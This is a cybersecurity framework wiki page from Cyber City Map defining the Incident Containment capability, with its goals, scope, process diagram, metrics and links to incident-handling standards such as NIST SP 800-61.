Incident Containment - Cyber City Map

# Incident Containment [[Incident Containment]] is a top-level [[Cybersecurity]] capability. At a minimum, all organizations must be able to detect [[unauthorized access]] and ensure systems and assets can be restored to a secure state post-compromise. Incident Containment is the starting point for understanding the total risk an organization can accept and still meet compliance obligations. This means that risks taken must be evaluated for their potential to achieve unauthorized access. All known risks with the potential for unauthorized access are then the basis for establishing response and containment capabilities. In organizations with significant adversary interest or a high risk appetite, Incident Containment is a critical capability and must have enough resources to match the risks an organization plans to take. Reporting adversary abuse to hosting providers and other services used in an attack can help those organizations bolster their defenses as well. Ultimately, faster detection, containment, and restoration are optimal with failure tracing being essential to continuous improvement of cybersecurity. ## Map ``` mermaid  graph TD Top[[Cybersecurity]] --- E[[Incident Containment]] E --- E.1[[Alert Correlation]] E --- E.2[[Case Management]] E --- E.3[[Incident Management]] E --- E.4[[Forensic Analysis]] E --- E.5[[Asset Restoration]] E --- E.6[[Abuse Reporting]] E --- E.7[[Failure Tracing]] %% Class Definitions %% ===================== class Top,A,A.1,A.2,A.2,A.3,A.4,A.5,A.6,B,B.1,B.2,B.3,B.4,B.5,C,C.1,C.2,C.3,C.4,D,D.1,D.2,D.3,D.4,D.5,E,E.1,E.2,E.3,E.4,E.5,E.6,E.7 internal-link,font-color:white; class Top cssClassL0; classDef cssClassL0 fill:black,stroke:black,stroke-width:4px,font-size:15px,font-color:white; class A,B,C,D,E cssClassL1; classDef cssClassL1 fill:darkblue,stroke:darkblue,stroke-width:4px,font-size:15px,font-color:white; class A.2,A.3,A.4,A.5,A.6,B.1,B.2,B.3,B.4,B.5,C.1,C.2,C.3,C.4,D.1,D.2,D.3,D.4,D.5,E.1,E.2,E.3,E.4,E.5,E.6,E.7 cssClassL2; classDef cssClassL2 fill:blue,stroke:blue,stroke-width:4px,font-size:15px,font-color:white; class E cssClassCurrent; classDef cssClassCurrent fill:#2f9503,stroke:#2f9503,stroke-width:4px,font-size:15px,font-color:white; ``` ## Definition > [!cm-definition] Definition > **Incident Containment** is a set of capabilities implemented to detect and contain an incident so that assets can be restored to an appropriate level of securability post compromise. Incident containment includes all elements of discovering, handling, restoration, reporting, and failure tracing required to close the loop on restoring and improving the cybersecurity of the environment. ## Goals >[!cm-goal] Goal 1 >**Rapid Detection** - Unauthorized access to a resource is easily detected and alerts are available for correlation and triage. >[!cm-goal] Goal 2 >**Contain Incident** - Reduce the potential for lateral movement by an adversary and pursuit of other asset weaknesses from their unauthorized position. >[!cm-goal] Goal 3 >**Quick Restoration** - Assets can be restored to a secured state as quickly as possible when compromised. >[!cm-goal] Goal 4 >**Traceability** - Any incident that can be tracked to a known risk or vulnerability should be marked for reporting and strategic remediation investment decisions during root cause analysis. ## Scope The scope of Incident Containment covers all assets with a defined defensive model outlined in Control Development, still exposed as operating in a weakened state determined by Control Verification, pose a risk to the organization's defined control posture, and demonstrate an abused asset or anomalies within the system. ## Process ```mermaid flowchart LR A1[Events as Input] --> B[1. Develop Alerts] A2[Alerts as Input] --> C[2. Correlate Anomalies] B --> C C --> D1[3. Identify Cases] D2[Receive Externally Reported Case] --> D1 D1 --> E[4. Identify Incidents] E --> F1[5. Perform Forensic Analysis] F1 --> F2[Leverage External Forensics] F2 --> F1 F1 --> G[6. Restore Assets] G --> F1 G --> H1[7. Report Abuse Externally] H1 --> H2[Provide Disclosures] H1 --> I[8. Trace Failure via Killchain] I --> J[Share with Internal Stakeholders] ``` ## Metrics >[!cm-metric] Metric: [[% of Incident Response Capacity Utilized per Year]] >[!cm-metric] Metric: [[Mean Time to Contain]] >[!cm-metric] Metric: [[Mean Time to Contain a Predictable Incident]] >[!cm-metric] Metric: [[Mean Time to Restore]] >[!cm-metric] Metric: [[Trend of Predictable Incidents]] >[!cm-metric] Metric: [[% of incidents past time to detect and time to respond thresholds]] >[!cm-metric] Metric: [[% of Incidents vs. Total Events]] >[!cm-metric] Metric: [[% of Alerts vs. Total Events]] ## Inspiration & Resources + [SP 800-61 Rev. 2, Computer Security Incident Handling Guide | CSRC (nist.gov)](https://csrc.nist.gov/pubs/sp/800/61/r2/final) + [Toolkit: Cybersecurity Incident Response Plan (gartner.com)](https://www.gartner.com/en/documents/4009176) + [FIRST - Improving Security Together](https://www.first.org/) + [Establishing a CSIRT (first.org)](https://www.first.org/resources/guides/Establishing-CSIRT-v1.2.pdf) + [Federal Government Cybersecurity Incident & Vulnerability Response Playbooks (cisa.gov)](https://www.cisa.gov/sites/default/files/2024-03/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf) + [Handbook for Computer Security Incident Response Teams (CSIRTs) (cmu.edu)](https://insights.sei.cmu.edu/documents/1606/2003_002_001_14102.pdf) + [ISO/IEC 27035-1:2023 - Information technology — Information security incident management — Part 1: Principles and process](https://www.iso.org/standard/78973.html) + [Good Practice Guide for Incident Management — ENISA (europa.eu)](https://www.enisa.europa.eu/publications/good-practice-guide-for-incident-management) ## Release Notes + [[Q2 2024 Release#Document L1 for Incident Containment]] ## [Cyber City Map](https://cybercitymap.com/) © 2023-2024 by [ThirdScore, Inc.](https://thirdscore.com/) All Rights Reserved.